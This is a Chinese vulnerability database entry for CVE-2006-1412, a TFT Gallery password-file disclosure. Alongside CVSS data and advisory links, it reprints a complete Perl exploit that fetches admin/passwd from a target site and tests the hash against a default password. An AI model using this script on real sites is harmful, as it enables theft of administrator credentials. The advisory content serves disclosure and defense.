CVE-2006-1412
CVSS5.0
发布时间 :2006-03-28 06:06:00
修订时间 :2011-03-07 21:33:03
NMCOE    

[原文]TFT Gallery 0.10 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the admin password file and obtain password hashes via a direct request to admin/passwd.


[CNNVD]TFT Gallery管理员口令信息泄露漏洞(CNNVD-200603-467)

        TFT Gallery 0.10存储敏感信息在没有足够访问控制的web根目录下,远程攻击者可通过一条对admin/passwd的直接请求下载管理员口令文件和获取口令散列。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1412
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1412
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200603-467
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/1115
(UNKNOWN)  VUPEN  ADV-2006-1115
http://secunia.com/advisories/19411
(VENDOR_ADVISORY)  SECUNIA  19411
http://milw0rm.com/exploits/1611
(UNKNOWN)  MILW0RM  1611
http://xforce.iss.net/xforce/xfdb/25465
(UNKNOWN)  XF  tftgallery-passwd-disclosure(25465)
http://www.securityfocus.com/bid/17250
(UNKNOWN)  BID  17250
http://www.securityfocus.com/archive/1/archive/1/453485/100/0/threaded
(UNKNOWN)  BUGTRAQ  20061204 Re: Multiple bugs in TFT-Gallery
http://www.securityfocus.com/archive/1/archive/1/453471/100/0/threaded
(UNKNOWN)  BUGTRAQ  20061204 Multiple bugs in TFT-Gallery

- 漏洞信息

TFT Gallery管理员口令信息泄露漏洞
中危 访问验证错误
2006-03-28 00:00:00 2006-03-28 00:00:00
远程  
        TFT Gallery 0.10存储敏感信息在没有足够访问控制的web根目录下,远程攻击者可通过一条对admin/passwd的直接请求下载管理员口令文件和获取口令散列。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本。

- 漏洞信息 (1611)

TFT Gallery <= 0.10 [Password Disclosure] Remote Exploit (EDBID:1611)
php webapps
2006-03-25 Verified
0 undefined1_
N/A [点击下载]
#!/usr/bin/perl

###############################################################################
#Copyright (C) undefined1_
#
#This program is free software; you can redistribute it and/or
#modify it under the terms of the GNU General Public License
#as published by the Free Software Foundation; either version 2
#of the License, or (at your option) any later version.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#along with this program; if not, write to the Free Software
#Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#
###############################################################################

use strict; 
use IO::Socket;

$| = 1;
printf ":: tftgallery 0.10 exploit - by undefined1_ @ bash-x.net/undef/ ::\n\n\n";


my $website = shift || usage();

my $path = "/";
my $site = $website;
if(index($website, "/") != -1)
{
	my $index = index($website, "/");
	$path = substr($website, $index);
	$site = substr($website, 0, $index);
	if(substr($path, length($path)-1) ne "/")
	{
		$path .= "/";
	}
}


my $eop = "\r\nHost: $site\r\n";
$eop .= "User-Agent: Mozilla/5.0\r\n";
$eop .= "Connection: close\r\n\r\n";


my $packet1 = "GET ".$path."admin/passwd HTTP/1.1";
my $data = sendpacket($site, $packet1.$eop);

if($data !~ /HTTP\/1.1 200 OK/)
{
	die "failed to retrieve the admin password\n";
}

my $password = "";
if (index($data, "\r\n\r\n") != -1)
{
	$password = substr($data, index($data, "\r\n\r\n")+4);
	chomp $password;
}
else
{
	die "failed to retrieve the admin password\n";
}

print "The password hash is: '$password'\n";
if(crypt("admin","tftgallery") eq $password)
{
	print "The plaintext password is: 'admin'\n";		
}
else
{
	die "Use john the ripper, luke!\n";
}




sub sendpacket(\$,\$) {
	my $server = shift;
	my $request = shift;

	my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $server, PeerPort => "80") or die "[-] Could not connect to $server:80 $!\n";
	print $sock "$request";

	
	my $data = "";
	my $answer;
	while($answer = <$sock>)
	{
		$data .= $answer;
	}
	
	close($sock);
	return $data;
}

sub usage() {
	printf "usage: %s <website> [password]\n", $0;
	printf "ex. : %s www.site.com/tftgallery/\n", $0;
	exit;
}

# milw0rm.com [2006-03-25]
		

- 漏洞信息

24164
TFT Gallery admin/passwd Admin Password Hash Disclosure
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-03-25 Unknow
2006-03-25 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站